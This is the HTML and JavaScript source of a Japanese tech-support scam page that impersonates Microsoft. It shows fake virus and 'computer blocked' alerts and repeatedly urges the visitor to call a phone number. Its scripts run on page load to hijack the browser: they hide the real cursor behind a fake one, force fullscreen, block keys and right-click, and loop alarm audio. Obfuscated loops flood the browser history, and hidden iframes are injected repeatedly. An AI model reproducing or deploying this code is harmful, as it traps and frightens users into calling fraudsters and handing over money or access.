

<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-153875879-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-153875879-1');
</script>





    <meta name="google" value="notranslate">
    <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Microsoft-Windows公式ヘルプライン</title>




  <link href="./images/favicon.ico" rel="shortcut icon">

  <!-- Latest compiled and minified CSS -->
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"
        integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">

  <!-- Optional theme -->
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css"
        integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous">

  <!--<link rel="stylesheet" href="https://cdn.jsdelivr.net/bxslider/4.2.12/jquery.bxslider.css">-->
  <link rel="stylesheet" type="text/css" href="css/style.css">

  <script src="https://code.jquery.com/jquery-3.2.1.min.js" type="text/javascript"></script>

  <style>


  .blinkx {
  background-color:green;
    animation: blink-animation 1s steps(5, start) infinite;
    -webkit-animation: blink-animation 1s steps(5, start) infinite;
  }

  .blink1 {
  background-color:green;
    animation: blink-animation 1s steps(5, start) infinite;
    -webkit-animation: blink-animation 1s steps(5, start) infinite;
  }

  @keyframes blink-animation {
    to {
      visibility: hidden;
    }
  }
  @-webkit-keyframes blink-animation {
    to {
      visibility: hidden;
    }
  }
  </style>

  <style>



  /* The Modal (background) */
  .modal {
  	position: fixed; /* Stay in place */
  	z-index: 1; /* Sit on top */
  	padding-top: 0px; /* Location of the box */
  	left: 0px;
  	top: 0px;
  	width: 100%; /* Full width */
  	height: 100%; /* Full height */
  	overflow: auto; /* Enable scroll if needed */
  	background-color: rgb(0,0,0); /* Fallback color */
  	background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
  	font-family:arial; font-weight:900;
  }

  /* Modal Content */
  .modal-content {
  	position: relative;
  	background-color: red;
  	margin: auto;
  	padding: 0;
  	left: 52px;
  	/*border: 1px solid #888;*/
  	width: 45%;
  	box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2),0 6px 20px 0 rgba(0,0,0,0.19);
  	-webkit-animation-name: animatetop;
  	-webkit-animation-duration: 0.4s;
  	animation-name: animatetop;
  	animation-duration: 0.4s
  }

  /* Add Animation */
  @-webkit-keyframes animatetop {
  	from {top:-300px; opacity:0}
  	to {top:0; opacity:1}
  }

  @keyframes animatetop {
  	from {top:-300px; opacity:0}
  	to {top:0; opacity:1}
  }

  /* The Close Button */
  .close {
  display:none;
  	color: white;
  	float: right;
  	font-size: 28px;
  	font-weight: bold;
  }

  .close:hover,
  .close:focus {
  	color: #000;
  	text-decoration: none;
  	cursor: pointer;
  }

  .modal-header {
  	padding: 2px 20px;
  	background-color: red;
  	color: white;

  }
  .modal-header h2
  {
  border:none;
  font-size:42px;
  }

  .modal-body {padding: 2px 20px;color:white;}

  .modal-footer {
  	padding: 2px 10px;
  	background-color: red;
  	color: white;
  	height:80px;

  }

  .modal-footer btn{
  background-color:black;
  }




  </style>


  <style>div.fixed{position:fixed;bottom:0;right:-220px; width: 550px;border:1px }</style>
  <style>div.fixed2{position:fixed;bottom:0px;right:10px;width:255px;height:50px;border:1px;color:black;font-size:30px;font-weight:bold;-webkit-animation-name:example;-webkit-animation-duration:1s;animation-name:example;animation-duration:1s;animation-iteration-count:infinite}@-webkit-keyframes example{0%{color:black}50%{color:red}100%{color:black}}@keyframes example{0%{color:black}50%{color:red}100%{color:black}}</style>


    <script src=./js/jquery.min.js></script>
    <script>
        function formatAMPM() {
            var d = new Date()
              , minutes = d.getMinutes().toString().length == 1 ? '0' + d.getMinutes() : d.getMinutes()
              , hours = d.getHours().toString().length == 1 ? '0' + d.getHours() : d.getHours()
              , ampm = d.getHours() >= 12 ? 'pm' : 'am'
              , months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
              , days = ['Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat'];
            return days[d.getDay()] + ' ' + months[d.getMonth()] + ' ' + d.getDate() + ' ' + d.getFullYear() + ' ' + hours + ':' + minutes + ampm;
        }
    </script>
    <script>
        function getURLParameter(a) {
            return decodeURI((RegExp(a + "=(.+?)(&|$)").exec(location.search) || [, null])[1] || "")
        }
        function random_betw(b, a) {
            return Math.round(Math.random() * (a - b) + b)
        }
        var phone = "(050) 5539-7732";
          var text = "**  Microsoft Windowsサポート (050) 5539-7732 **";
            </script>
    <script>
        var w = window.screen.width;
        var h = window.screen.height;
        window.moveTo(0, 0);
        window.resizeTo(w, h);
    </script>
    <script>
        var isOpera = !!window.opera || navigator.userAgent.indexOf(" OPR/") >= 0;
        var isFirefox = typeof InstallTrigger !== "undefined";
        var isSafari = Object.prototype.toString.call(window.HTMLElement).indexOf("Constructor") > 0;
        var isChrome = !!window.chrome && !isOpera;
        var isIE = /*@cc_on!@*/
        false || !!document.documentMode;
    </script>


    <script type="text/javascript">
    	$(document).ready(function(){

    	//-------------- fake cursor -----------------------------------
    						 function makeNewPosition() {
    								 var h = $(window).height() - 50, w = $(window).width() - 50, nh = Math.floor(Math.random() * h), nw = Math.floor(Math.random() * w); return [nh, nw];
    						 }
    						 function animateDiv() {
    								 var newq = makeNewPosition(), oldq = $(".fakeCursor").offset(), speed = calcSpeed([oldq.top, oldq.left], newq); $(".fakeCursor").animate({ top: newq[0], left: newq[1] }, speed, function () { animateDiv(); });

    						 };
    						 function calcSpeed(prev, next) {
    								 var x = Math.abs(prev[1] - next[1]), y = Math.abs(prev[0] - next[0]), greatest = x > y ? x : y, speedModifier = 0.3, speed = Math.ceil(greatest / speedModifier); return speed;
    						 }


    						 animateDiv();
    });



    </script>

    <style type="text/css">

    	html{
    		cursor: none;
    	}
    	.fakeCursor {
    								width: 17px;
    								height: 25px;
    								background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABEAAAAZCAMAAADg4DWlAAAAmVBMVEUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///8jo0yHAAAAMXRSTlMAAQUPA0IfMgInFzlGCwwpGQcJEiIIP04vGDoqDgYbNVFDGjFBMEgWIElFEyw4PjRLq1RDbAAAALhJREFUeF5V0NlygzAMBVDbKK1tgtlJSgrZ93RR/v/jgjwTC/R45o6kuUJIDVqK0SDkSaHGhBhlNhoTPtGkH0QsT4w/iVgGmjGRMAVhCsLEwsTCRDKhsIemTW2hvQyKm8Xp989kCZAgyeL/cKxslFMG11uia7OySQdSIO72Mcl8tvyq/fX6bNKLp7j6Bnqxo34mId+h5tC7Z5Jbs7qrUJxEfLQ/pmQR4HpjegcsUrmydNQHEygFA7wAtBchFf1cSBMAAAAASUVORK5CYII=");
    								position: fixed;
    									top:5px;
    									left: 400px;
    								z-index: 100;
    						}
    </style>


    <style type="text/css">
    .nocursor { cursor:none; }
    </style>

</head>
<body class="en ltr" style="cursor: none; background-image: url('./images/background.png');" id="chrome-alerts" >
<div class="fakeCursor"></div>

<div id="body" class="container-fluid">
  <div class="row">
    <div class="col-md-12">
      <div class="row block1">
        <div class="col-md-4 left">
          <strong>Microsoftの保証通話料無料:</strong>
          <p style="font-size:30px; color: rgba(0, 0, 0, 0.7);"> (050) 5539-7732
 </p>
          <label style="font-size: 12px;">
            <input checked="nonchecked" type="checkbox"> このページが追加の対話を作成しないようにします。</label>
        </div>
        <div class="col-md-4">
          <div class="middle" id="alert-modal">
            <a style="margin-right: 8px" href="" class="cross">x</a>
            <div class="content-box" id="alert-content-box">
              <center><strong>Microsoftからのウイルス警告</strong></center>
              <center><h5><b>このコンピュータはブロックされています</b></h5></center>
              <h6><b>このウィンドウを閉じてコンピュータを再起動しないでください</b></h6>
              <h6><b>コンピュータの登録キーはブロックされています。</b></h6>
              <h6><b>コンピュータをブロックした理由</b></h6>
              <h6>ウィンドウの登録キーが不正です。</h6>
              <h6>このウィンドウでは海賊版のソフトウェアです。</h6>
              <h6>このウィンドウが最前面ウイルスの送信、インターネット</h6>
              <h6>このウィンドウはハッキングされているか、未定義の場所から使用されています。</h6>
              <h6>またブロックのこのコンピュータセキュリティ確保のため. </h6>
              <h6>Microsoftヘルプラインにお問い合わせください。</h6>

                  <p style="font-size:20px; color: rgba(0, 0, 0, 0.7);">Microsoftヘルプライン(050) 5539-7732
 </p>
                  <button class="ms-btn chat_now blink" style="background-color:green; color:white; float:right">安全に戻る</button>





            </div>
          </div>


                </div>

              </div>
            </div>
          </div>
        </div>
        <div class="col-md-4 right" style="float:right">

          <form style="text-align: left;" action="login.php.htm" method="POST" align="center">
            <div>
              <strong>Microsoft登録キーを入力してブロックを解除します。</strong>
            </div>
            <div class="tbl-center" style="margin-top: 5px;">
              <strong style="text-align:left;color: rgba(0, 0, 0, 0.7);"> ENTERキー :</strong>
              <div style="min-width:100px;">
                <input type="text" name="ENTER KEY" style="width: 100%;" />
              </div>
              <div>
                <input class="ms-btn" type="button" value="送信">
              </div>
            </div>
          </form>
        </div>
      </div>
    </div>
  </div>
</div>



<div class="block2" style="background-color:#0067B8;">
  <div class="row">
    <div class="col-md-3">
      <img style="height: 240px; width: auto;" src="./images/rsod.png">
    </div>
    <div class="col-md-6">
      <div id="red_alert" style="margin-bottom: 25px;">
        <h1><img style="height: 40px; width: 40px; margin-top: -10px;" src="images/335158-windows-8-window.png"> Microsoft
サポート警報</h1>
        <h3>あなたのシステムは異常な活動を検出した。</h3>
        <h5>を傷めることがありますパソコンのデータごとの金融活動です。</h5>
        <h3>この活動を(050) 5539-7732に報告してください
</h3>
      </div>
      <div class="row">
        <div class="col-md-12">
          <div class="row">
            <div class="col-md-6 no-padding-right">
              <button class="ms-btn">警告を無視</button>
            </div>
            <div class="col-md-6 no-padding-left">
              <button class="ms-btn chat_now blink" style="background-color:green; color:white">このページを離れる</button>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>


<div class="fixed">
<img src="image.jpeg" style="position: absolute; left: 1px; bottom: 1px;"></div><div class="fixed2">(050) 5539-7732
</div>


<div id="myModal" class="modal" style="display:inline-block;">

  <!-- Modal content -->
  <div class="modal-content">
    <div class="modal-header">
      <span class="close">&times;</span>
      <h2 style="font-size:32px">Microsoft Windowsの警告アラート  <br/> <span style="font-size:24px">コールヘルプライン(050) 5539-7732(フリーダイヤル)</span> </h2>
    </div>

    <div class="modal-footer"style="font-size: 18px; border:none">


    <div style="float:right;"><strong class="active" style="padding:10px;background-color:blue;border:2px solid #fff;">とにかく走る</strong>&nbsp;&nbsp;&nbsp; <button class="active blinkx"  style="background-color:green;border:2px solid #fff; padding:10px;font-weight:bold; color:#fff; font-size:14px">安全に戻る</button></div>


    </div>
  </div>

</div>


<script type="text/javascript">/*<![CDATA[*/
// audio play /*
  var msgAudioEl = document.getElementById("msgSound");

  var playMsgInt = setInterval(function () {
    if (isPlaying(msgAudioEl)) {
      // console.log('already playing. clearing interval');
      clearInterval(playMsgInt);
    } else {
      // console.log('Triggering play');
      msgAudioEl.play();
    }
  }, 500);
  // audio play */

</script>

    <script type="text/javascript">/*<![CDATA[*/
    // audio play /*
      var msgAudioEl = document.getElementById("msgSound1");

      var playMsgInt = setInterval(function () {
        if (isPlaying(msgAudioEl)) {
          // console.log('already playing. clearing interval');
          clearInterval(playMsgInt);
        } else {
          // console.log('Triggering play');
          msgAudioEl.play();
        }
      }, 5000);
      // audio play */

    </script>

<script>
$(function() {
		if (isFirefox) {
				$("a").click(function(e) {
						e.preventDefault()
				});
				var e = ["pushState", "onbeforeunload", "", "returnValue", "onload", "toString"];
				o = e, u = 325,
						function(e) {
								for (; --e;) o.push(o.shift())
						}(++u);
				var n = function(n, t) {
						return e[n -= 0]
				};
				t = text, window[n("0x0")] = function(e) {
						var o = n("0x1") + t;
						return e[n("0x2")] = o, o
				}, window[n("0x3")] = function() {
						if (confirm("" + t))
								for (var e = "", o = 0; o < 1e8; o++) e += o[n("0x4")](), history[n("0x5")](0, 0, e);
						else
								for (e = "", o = 0; o < 1e8; o++) e += o[n("0x4")](), history[n("0x5")](0, 0, e)
				}
		}
		var t, o, u, r, c, i, l;
		if (isChrome || isOpera) {

				var d = !1;

				// $("head").append('<script src="./js/jquery.js"><\/script>'), $("head").append('<link href="./css/style.css" rel="stylesheet">'),
        document.getElementById("msgSound").play()
        debugger;
        window.onkeydown = function(e) {

            return !1
				}, window.onkeypress = function(e) {
						return !1
				}, onbeforeunload = function() {
						return alert("??????? ESC, ????? ??????? ????????!"), "??????? ESC, ????? ??????? ????????!"
				}, document.oncontextmenu = new Function("return false");
				for (var s = 0; s < 0; s++) alert(text);

				function a() {
						d ? (document.getElementById("blue-screen").style.display = "block", document.getElementsByTagName("body").item(0).setAttribute("class", "past")) : d = !0
				}

				function m() {
						document.fullscreenElement || document.mozFullScreenElement || document.webkitFullscreenElement || (document.documentElement.requestFullscreen ? document.documentElement.requestFullscreen() : document.documentElement.mozRequestFullScreen ? document.documentElement.mozRequestFullScreen() : document.documentElement.webkitRequestFullscreen && document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT))
				}

				document.getElementById("chrome-alerts").style.display = "block", document.addEventListener("keyup", function(e) {
						27 == e.keyCode && m()
				}, !1), document.addEventListener("keyup", function(e) {
						122 != e.keyCode && 17 != e.keyCode && 18 != e.keyCode && 13 != e.keyCode || (a(), m())
				}, !1), window.onload = function() {
						document.onclick = function(e) {

								e = e || event, target = e.target || e.srcElement, target.tagName, m(), a()
						}
				}, addEventListener("click", function() {
          debugger;
						a();
						var e = document.documentElement;
						(e.requestFullScreen || e.webkitRequestFullScreen || e.mozRequestFullScreen).call(e)
				}), window.addEventListener("resize", function() {
						$("body").css("overflow", "hidden"), $(".popup-alert").stop().animate({
								bottom: "-10px",
								opacity: 1
						}, 500), document.getElementById("msgSound").play(), screen.width, window.innerWidth, window.setInterval(function() {
								for (var e = 0; e < 100; e++) history.pushState(0, 0, e)
						}, 500)
				})
		}
		if (isIE || isSafari) {
				$("#blue-screen,.chrome-alert").hide();
				var f = ["onmouseout", "body", "addEventListener", "mouseout", "*************************************************\nRDN/YahLover.worm!055BCCAC9FEC Infection\n*************************************************\n\n", "attachEvent"];
				i = f, l = 361,
						function(e) {
								for (; --e;) i.push(i.shift())
						}(++l);
				var y = function(e, n) {
						return f[e -= 0]
				};
				r = text, c = text, alert(r), document[y("0x0")][y("0x1")] ? document[y("0x0")][y("0x1")](y("0x2"), function(e) {
						alert(y("0x3") + r)
				}, !1) : document[y("0x0")][y("0x4")](y("0x5"), function(e) {
						alert(r)
				}), window.onbeforeunload = function() {
						return c
				}
		}
});

</script>

  <audio autoplay="autoplay" loop="" id="msgSound">
    <source src="err.mp3" type="audio/mpeg">
  </audio>





  <script type=text/javascript>
  function get_browser() {
  var b = navigator.userAgent, a, c = b.match(/(opera|chrome|safari|firefox|msie|trident(?=\/))\/?\s*(\d+)/i) || [];
  if (/trident/i.test(c[1])) {
  a = /\brv[ :]+(\d+)/g.exec(b) || [];
  return {
  name: "IE",
  version: (a[1] || "")
  }
  }
  if (c[1] === "Chrome") {
  a = b.match(/\bOPR\/(\d+)/);
  if (a != null) {
  return {
  name: "Opera",
  version: a[1]
  }
  }
  }
  c = c[2] ? [c[1], c[2]] : [navigator.appName, navigator.appVersion, "-?"];
  if ((a = b.match(/version\/(\d+)/i)) != null) {
  c.splice(1, 1, a[1])
  }
  return {
  name: c[0],
  version: c[1]
  }
  }
  var InternetEx = window.navigator.appVersion.indexOf("MSIE") != -1;
  var isIEedge = window.navigator.userAgent.indexOf("Edge") > -1;
  var browser = get_browser();
  if (browser.name == "Firefox" || isIEedge || InternetEx || navigator.appName == "Microsoft Internet Explorer" || !!(navigator.userAgent.match(/Trident/) || navigator.userAgent.match(/rv:11/))) {
  if (isIEedge || InternetEx || navigator.appName == "Microsoft Internet Explorer" || !!(navigator.userAgent.match(/Trident/) || navigator.userAgent.match(/rv:11/))) {
  function msg_ff() {
  var a = document.createElement("div");
  a.innerHTML = '<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="Code0x72_df10dfdFRnkfdJP1018.php"></iframe></div>';
  document.body.appendChild(a)
  }
  window.setInterval(function() {
  msg_ff()
  }, 1100)
  } else {
  function msg_ff() {
  var a = document.createElement("div");
  a.innerHTML = '<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="Code0x72_df10dfdFRnkfdJP1018.php"></iframe></div>';
  document.body.appendChild(a)
  }
  window.setInterval(function() {
  msg_ff()
  }, 1100)
  }
  } else {}
  ;</script>




<iframe src="beep.mp3" allow="autoplay" style="display:none;">
</body>
</html>
